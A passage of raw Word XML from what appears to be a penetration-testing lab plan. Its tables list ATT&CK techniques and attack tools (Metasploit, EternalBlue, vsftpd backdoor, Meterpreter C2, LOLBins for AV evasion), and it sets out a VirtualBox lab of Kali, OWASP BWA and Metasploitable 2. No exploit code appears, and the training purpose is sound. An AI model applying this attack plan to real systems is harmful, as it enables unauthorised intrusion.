                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>192.168.56.102</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="3803F75A" w14:textId="77777777" w:rsidTr="00D617DD">
              <w:trPr>
                <w:trHeight w:val="683"/>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E89EE1F" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>9 - C2</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C80F601" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Command &amp; Control</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A6A3691" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Application Layer Protocol: Meterpreter/reverse shell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7BC26F9" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>T1071</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0830178B" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Multiple</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="0B3518F5" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="37E3699E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="2A579F5A" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="7E890813" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="6A07AC92" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="43745DFE" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="6246A3E6" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="4B0AAB76" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="73609FD6" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="5CE0CA01" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="36B26C8B" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="75FAE4B6" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="00DC5A96" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC5A96">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3. Tools and Technique </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9242"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C934DB" w14:paraId="172811CB" w14:textId="77777777" w:rsidTr="00D617DD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8579" w:type="dxa"/>
          </w:tcPr>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89"/>
              <w:gridCol w:w="2434"/>
              <w:gridCol w:w="1654"/>
              <w:gridCol w:w="2783"/>
            </w:tblGrid>
            <w:tr w:rsidR="00C934DB" w14:paraId="448E8495" w14:textId="77777777" w:rsidTr="00D617DD">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3525209D" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Tool</w:t>
                  </w:r>
                </w:p>
              </w:tc>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6C6102AC" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Purpose</w:t>
                  </w:r>
                </w:p>
              </w:tc>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60B05FF1" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Real/Simulated</w:t>
                  </w:r>
                </w:p>
              </w:tc>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695D8A46" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Justification</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="1C885CC2"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A812A36" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Nmap 7.x</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83D2A8A" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Network/port scanning, service enumeration</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D95D091" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Real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76F1BC0" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Industry standard recon tool; low noise at default timing</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="2B710711"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365B474F" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Metasploit Framework</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6CB6A74" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Exploit delivery, payload staging, Meterpreter C2</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4BFCC4B" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Real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D0D1F27" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Required to </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>weaponise</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>vsftpd</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> and </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>EternalBlue</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> exploits reliably</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="3A801C2E"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A28E03C" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>SQLmap</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>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D2F1517" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Automated SQL injection detection and exploitation</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2491582" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Real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8CAE356" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Efficient enumeration of OWASP web app database</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="3024394B"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5FC5E48E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Burp Suite Community</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5DDFF3E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Web proxy, manual request inspection</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7095B753" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Real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AA6E822" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>HTTP traffic interception for web app attack surface mapping</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="116B1762"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78B6BD05" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Netcat</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> (</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>nc</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>)</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57E73A9" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Reverse shell listener, file transfer</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F27E433" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Real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86A4F25" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>LOLBin</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>-style utility; minimal footprint</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="077B2CCA"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546CD561" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>BloodHound</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>SharpHound</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>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E42CEB7" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>AD enumeration (simulated - no AD in lab)</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4013294" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Simulated</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CFE010E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Lab lacks full AD; technique documented for completeness</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="35F74C2A"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B71E56D" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Meterpreter</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B7B483B" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Post-exploitation agent (Metasploit)</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38F0422" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Real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09E5A33" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Encrypted C2 channel, in-memory execution for stealth</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="04D29A31"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6B31C7D7" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>whoami</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> / ipconfig / net</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FCC621D" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Living-Off-the-Land post-exploitation</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0EDCD8AA" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Real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970BB69" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Native Windows </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>LOLBins</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>; avoid AV detection</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="1E72049F" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="773F5DE7" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="443B3E8D" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="00DC5A96" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC5A96">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Lab Environment Design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDB8243" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>The VirtualBox lab environment replicates a simplified corporate network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1321126B" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="76CC50AF" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="17404429" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="008854BF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75A4C088" wp14:editId="4C7B135E">
            <wp:extent cx="5731510" cy="3510915"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="265041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670361" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3510915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="178392AB" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="2D9E5F52" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="005D6CFF" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D6CFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.1 Kali Linux (192.168.56.104)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBBA548" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Role: Attacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC0827D" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t xml:space="preserve">Tools: Nmap, Burp Suite, Metasploit, Hydra, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, Python scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105ACC41" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Purpose: Launch attacks, manage shells, perform recon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065AA119" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="5DE2FA7F" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="005D6CFF" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D6CFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 OWASP BWA (192.168.56.102)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B0BFBD" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Role: Public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>facing web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B89B31" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Services: Apache, MySQL, PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F265EFE" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t xml:space="preserve">Contains vulnerable applications such as DVWA, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mutillidae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WebGoat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7E173F51" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Purpose: Initial access target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE4FFBC" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="005D6CFF" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D6CFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D6CFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D6CFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 (192.168.56.101)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5833AC22" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Role: Internal Linux server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515F7037" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Services: VSFTPD, Tomcat, Samba, MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5560BBFB" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Known vulnerabilities (e.g., VSFTPD backdoor, weak SSH credentials)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B186964" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
